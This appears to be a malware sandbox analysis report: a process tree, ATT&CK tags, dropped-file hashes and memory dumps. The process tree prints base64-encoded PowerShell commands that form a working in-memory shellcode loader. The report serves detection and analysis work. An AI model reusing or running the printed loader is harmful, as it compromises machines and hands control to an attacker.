EAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABxAFMAWQAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADkAVABEACkAKQA7ACQATwAzAFgAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABXAGYATABnACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAFcAZgBMAGcAIAAkAE8AMwBYACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAE8AMwBYACAAJABlACIAOwB9AA==
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2548
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABiAE0AWQBIACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYgBNAFkASAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGIALAAwAHgAYwBiACwAMAB4AGIAZgAsADAAeAA5ADcALAAwAHgAOQA4ACwAMAB4ADUANQAsADAAeAAxADAALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAZAAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA1ADAALAAwAHgAMwAxACwAMAB4ADcAZAAsADAAeAAxAGEALAAwAHgAOAAzACwAMAB4AGUAZAAsADAAeABmAGMALAAwAHgAMAAzACwAMAB4ADcAZAAsADAAeAAxADYALAAwAHgAZQAyACwAMAB4ADYAMgAsADAAeAA2ADQALAAwAHgAYgBkACwAMAB4ADkAZgAsADAAeAA4AGMALAAwAHgAOQA1ACwAMAB4ADMAZQAsADAAeABjADAALAAwAHgAYgBkACwAMAB4ADQANwAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4AGUAZgAsADAAeAA1ADcALAAwAHgAMgBhACwAMAB4ADYAZQAsADAAeAA4ADQALAAwAHgAYwBhACwAMAB4ADIAMAAsADAAeABmAGEALAAwAHgAYwA4ACwAMAB4AGYAZQAsADAAeAAwADkALAAwAHgAMAAzACwAMAB4AGUAMwAsADAAeAA0ADkALAAwAHgAMgAzACwAMAB4AGQAZAAsADAAeAA3ADAALAAwAHgAYwA3ACwAMAB4ADkAYwAsADAAeAAxADAALAAwAHgANAA2ACwAMAB4ADgANAAsADAAeABlADEALAAwAHgAMwAzACwAMAB4ADMAYQAsADAAeABkADcALAAwAHgAMwA1ACwAMAB4ADkANAAsADAAeAAwADMALAAwAHgAMQA4ACwAMAB4ADQAOAAsADAAeABkADUALAAwAHgANAA0ACwAMAB4AGUAZQAsADAAeAAyADYALAAwAHgAMwBhACwAMAB4ADEAOAAsADAAeAA3AGEALAAwAHgAOQBhACwAMAB4AGQANAAsADAAeAAxADcALAAwAHgAMwBlACwAMAB4ADIANwAsADAAeABkADQALAAwAHgAZgA3ACwAMAB4ADMANAAsADAAeAAxADcALAAwAHgAYQBlACwAMAB4AGEAMAAsADAAeABjAGYALAAwAHgANQA4ACwAMAB4ADMAYQAsADAAeAAwADIALAAwAHgAZAAxACwAMAB4ADgAOAAsADAAeAA5ADMALAAwAHgAMQAxACwAMAB4ADkAOQAsADAAeAAzADAALAAwAHgAOQBmACwAMAB4ADcAZAAsADAAeAAzAGEALAAwAHgANAAwACwAMAB4ADQAYwAsADAAeABmADgALAAwAHgAZgAzACwAMAB4ADMANgAsADAAeAA0AGUALAAwAHgANABiACwAMAB4ADMANQAsADAAeAA0ADgALAAwAHgAMgA1ACwAMAB4ADcAZgAsADAAeABiAGUALAAwAHgAYgA3ACwAMAB4AGUAYwAsADAAeAA0AGUALAAwAHgAMAAwACwAMAB4ADEAYgAsADAAeABkADEALAAwAHgANwBmACwAMAB4ADgAZAAsADAAeAA2ADUALAAwAHgAMQA1ACwAMAB4ADQANwAsADAAeAA2AGUALAAwAHgAMQAwACwAMAB4ADYAZAAsADAAeABiADQALAAwAHgAMQAzACwAMAB4ADIAMwAsADAAeABiADYALAAwAHgAYwA3ACwAMAB4AGMAZgAsADAAeABhADYALAAwAHgAMgA5ACwAMAB4ADYAZgAsADAAeAA5AGIALAAwAHgAMQAxACwAMAB4ADgAZQAsADAAeAA4AGUALAAwAHgANAA4ACwAMAB4AGMANwAsADAAeAA0ADUALAAwAHgAOQBjACwAMAB4ADIANQAsADAAeAA4ADMALAAwAHgAMAAyACwAMAB4ADgAMAAsADAAeABiADgALAAwAHgANAAwACwAMAB4ADMAOQAsADAAeABiAGMALAAwAHgAMwAxACwAMAB4ADYANwAsADAAeABlAGUALAAwAHgAMwA1ACwAMAB4ADAAMQAsADAAeAA0AGMALAAwAHgAMgBhACwAMAB4ADEAZQAsADAAeABkADEALAAwAHgAZQBkACwAMAB4ADYAYgAsADAAeABmAGEALAAwAHgAYgA0ACwAMAB4ADEAMgAsADAAeAA2AGIALAAwAHgAYQAyACwAMAB4ADYAOQAsADAAeABiADcALAAwAHgAZQA3ACwAMAB4ADQAMAAsADAAeAA3AGYALAAwAHgAYwA3ACwAMAB4ADAANwAsADAAeAA5AGIALAAwAHgAOAAwACwAMAB4ADkANQAsADAAeAA5AGYALAAwAHgANQAwACwAMAB4ADQAZAAsADAAeAAyADYALAAwAHgANgAwACwAMAB4AGYAZQAsADAAeABjADYALAAwAHgANQA1ACwAMAB4ADUAMgAsADAAeABhADEALAAwAHgANwBjACwAMAB4AGYAMgAsADAAeABkAGUALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAAwADUALAAwAHgAMgAwACwAMAB4ADAAMQAsADAAeAAxAGIALAAwAHgAOQA5ACwAMAB4AGQAZgAsADAAeABhADkALAAwAHgANQBjACwAMAB4AGIAMwAsADAAeAAxAGIALAAwAHgAZgBkACwAMAB4ADAAYwAsADAAeABhAGIALAAwAHgAOABhACwAMAB4ADcAZAAsADAAeABjADcALAAwAHgAMgBiACwAMAB4ADMAMgAsADAAeABhADgALAAwAHgANAA4ACwAMAB4ADcAYwAsADAAeAA5AGMALAAwAHgAMAAyACwAMAB4ADIAOQAsADAAeAAyAGMALAAwAHgANQBjACwAMAB4AGYAMgAsADAAeABjADEALAAwAHgAMgA2ACwAMAB4ADUAMwAsADAAeAAyAGQALAAwAHgAZgAxACwAMAB4ADQAOAAsADAAeABiADkALAAwAHgANAA2ACwAMAB4ADEAYQAsADAAeABiADgALAAwAHgANAAyACwAMAB4ADYAOAAsADAAeABkAGIALAAwAHgAZgA0ACwAMAB4ADcAYgAsADAAeAA1ADgALAAwAHgAZgA1ACwAMAB4AGMANwAsADAAeAA0ADgALAAwAHgAYQA4ACwAMAB4ADIANwAsADAAeAAxADAALAAwAHgAOQA3ACwAMAB4AGUANgAsADAAeAAwADIALAAwAHgANQA5ACwAMAB4AGUANwAsADAAeAA5AGUALAAwAHgAYwA1ACwAMAB4AGIAMQAsADAAeABkADMALAAwAHgAZABlACwAMAB4AGUAOQAsADAAeAAxADcALAAwAHgAOQAwACwAMAB4ADkAZQAsADAAeAAwADkALAAwAHgAZgAyACwAMAB4AGEAZAAsADAAeAA0AGUALAAwAHgANQBhACwAMAB4ADAAMAAsADAAeABiADIALAAwAHgANwBmACwAMAB4AGMANgAsADAAeAA4AGQALAAwAHgANQA0ACwAMAB4ADEANQAsADAAeABlADYALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeAA4ADEALAAwAHgAOQBmACwAMAB4ADQAMQAsADAAeAA5AGIALAAwAHgAMwAwACwAMAB4ADUAZgAsADAAeAA1AGMALAAwAHgAZQAxACwAMAB4ADcAMgAsADAAeABlAGIALAAwAHgANQAzACwAMAB4ADEANQAsADAAeAAzAGMALAAwAHgAMQBjACwAMAB4ADEAOQAsADAAeAAwADUALAAwAHgAYQA4ACwAMAB4AGUAYwAsADAAeAA1ADQALAAwAHgANwA3ACwAMAB4ADcAZQAsADAAeABmADIALAAwAHgANAAyACwAMAB4ADEAMgAsADAAeAA3AGUALAAwAHgANgA2ACwAMAB4ADYAOQAsADAAeABiADUALAAwAHgAMgA5ACwAMAB4ADEAZQAsADAAeAA3ADMALAAwAHgAZQAwACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgAOABjACwAMAB4AGMANwAsADAAeAAxADYALAAwAHgAMAA4ACwAMAB4ADEAOQAsADAAeABhADgALAAwAHgANAAwACwAMAB4ADcANQAsADAAeABjAGQALAAwAHgAMgA4ACwAMAB4ADkAMAAsADAAeAAyADMALAAwAHgAOAA3ACwAMAB4ADIAOAAsADAAeABmADgALAAwAHgAOQAzACwAMAB4AGYAMwAsADAAeAA3AGEALAAwAHgAMQBkACwAMAB4AGQAYwAsADAAeAAyADkALAAwAHgAZQBmACwAMAB4ADgAZQAsADAAeAA0ADkALAAwAHgAZAAyACwAMAB4ADQANgAsADAAeAA2ADMALAAwAHgAZAA5ACwAMAB4AGIAYQAsADAAeAA2ADQALAAwAHgANQBhACwAMAB4ADIAZAAsADAAeAA2ADUALAAwAHgAOQA2ACwAMAB4ADgAOQAsADAAeABhAGYALAAwAHgANQA5ACwAMAB4ADQAMQAsADAAeABmADcALAAwAHgAYwA1ACwAMAB4AGIAMwAsADAAeAA1ADEAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHEAUwBZAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAFMAWQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQBTAFkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      Blocklisted process makes network request
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3280
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ypdmlsza\ypdmlsza.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1892
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB80.tmp" "c:\Users\Admin\AppData\Local\Temp\ypdmlsza\CSC833B38BE592F4C3C8AEE3B1E758632DE.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESBB80.tmp

Filesize
1KB

MD5
0b059e1e568484bf607b54fc128c59cb

SHA1
ae741e541558a07b55bf44a0f55469a34cad9ded

SHA256
92a0371d10dc3e483b3ed7decf31782390822bb0c73b111fccbf5365eea12794

SHA512
9faaefd92df1884440babe2d357f75334d133772df341d01a40b092c1145a2d2e60e730f7569ce953368d50e9b0f515e9ae7b38ddf2fa93a4b887406ea839e50

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oiouzatv.svv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ypdmlsza\ypdmlsza.dll

Filesize
3KB

MD5
d6e15396c676f8347cf61a04f9426bf5

SHA1
b128476e045e01551330d697713b7007a6272ddc

SHA256
758d5b5fe96c8a2294916474bb72472b43683bd6359b7b17eb5130337940545c

SHA512
48c0e745052821e121725a953f2b3d0b057d61086855e342bd2fade65e7c88182b71702c8df9f8b8c1c18eef5ffe53b60a8c7dc104d6bd2fea08260090d46047

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ypdmlsza\CSC833B38BE592F4C3C8AEE3B1E758632DE.TMP

Filesize
652B

MD5
0658c2694b7d6c479eb86bbf8e14cf1d

SHA1
4cb8718153f470d55d44fdc0e1399cf127ca3386

SHA256
793055d4e6a22fbfe1d654554f66cd8882c2d736f1d9d81f694137a53ff95fbf

SHA512
fd94ff601d508979a4f38726980eab433d244756e4f343945725f080e8d74ed6e411855ad41fbca3eb9c52021544627a266178904fc1db7c6fb95b826b913d7c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ypdmlsza\ypdmlsza.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ypdmlsza\ypdmlsza.cmdline

Filesize
369B

MD5
9d60e432ac9a9a45f04d9b5f275b615a

SHA1
2e7e90fa1adfa710e7153f5ab6aa3f469daa469a

SHA256
1492cb157ab0e6fecfa1fd952c712ad28a1a7384055d6a5789abb9b507c8d235

SHA512
af198a441bc732a7620b17c6d5f44882c26f3cdb3e03792b3432a852187d87d8b427bfcadefe338d7abc0aea9eb6e910115907f790fc54f8e1e0aa95b24b5421

Download Submit
memory/2548-52-0x00007FFC0D290000-0x00007FFC0DD51000-memory.dmp

Filesize
10.8MB

Download
memory/2548-2-0x00000238E1130000-0x00000238E1152000-memory.dmp

Filesize
136KB

Download
memory/2548-12-0x00007FFC0D290000-0x00007FFC0DD51000-memory.dmp

Filesize
10.8MB

Download
memory/2548-13-0x00007FFC0D290000-0x00007FFC0DD51000-memory.dmp

Filesize
10.8MB

Download
memory/2548-14-0x00007FFC0D290000-0x00007FFC0DD51000-memory.dmp

Filesize
10.8MB

Download
memory/3280-15-0x0000000002760000-0x0000000002796000-memory.dmp

Filesize
216KB

Download
memory/3280-16-0x0000000004F60000-0x0000000005588000-memory.dmp

Filesize
6.2MB

Download
memory/3280-21-0x0000000005590000-0x00000000055F6000-memory.dmp

Filesize
408KB

Download
memory/3280-22-0x0000000005600000-0x0000000005666000-memory.dmp

Filesize
408KB

Download
memory/3280-29-0x0000000005730000-0x0000000005A84000-memory.dmp

Filesize
3.3MB

Download
memory/3280-33-0x0000000005D40000-0x0000000005D5E000-memory.dmp

Filesize
120KB

Download
memory/3280-34-0x0000000005D70000-0x0000000005DBC000-memory.dmp

Filesize
304KB

Download
memory/3280-35-0x00000000075A0000-0x0000000007C1A000-memory.dmp

Filesize
6.5MB

Download
memory/3280-36-0x0000000006240000-0x000000000625A000-memory.dmp

Filesize
104KB

Download
memory/3280-20-0x0000000004E70000-0x0000000004E92000-memory.dmp

Filesize
136KB

Download
memory/3280-18-0x0000000002830000-0x0000000002840000-memory.dmp

Filesize
64KB

Download
memory/3280-19-0x00000000752FE000-0x00000000752FF000-memory.dmp

Filesize
4KB

Download
memory/3280-17-0x0000000002830000-0x0000000002840000-memory.dmp

Filesize
64KB

Download
memory/3280-55-0x00000000752FE000-0x00000000752FF000-memory.dmp

Filesize
4KB

Download
memory/3280-49-0x00000000062C0000-0x00000000062C8000-memory.dmp

Filesize
32KB

Download
memory/3280-51-0x0000000006370000-0x0000000006371000-memory.dmp

Filesize
4KB

Download
memory/3280-53-0x0000000002830000-0x0000000002840000-memory.dmp

Filesize
64KB

Download
memory/3280-54-0x0000000002830000-0x0000000002840000-memory.dmp

Filesize
64KB

Download
memory/4732-0-0x0000000000680000-0x000000000068A000-memory.dmp

Filesize
40KB

Download
memory/4732-1-0x00007FFC0D293000-0x00007FFC0D295000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads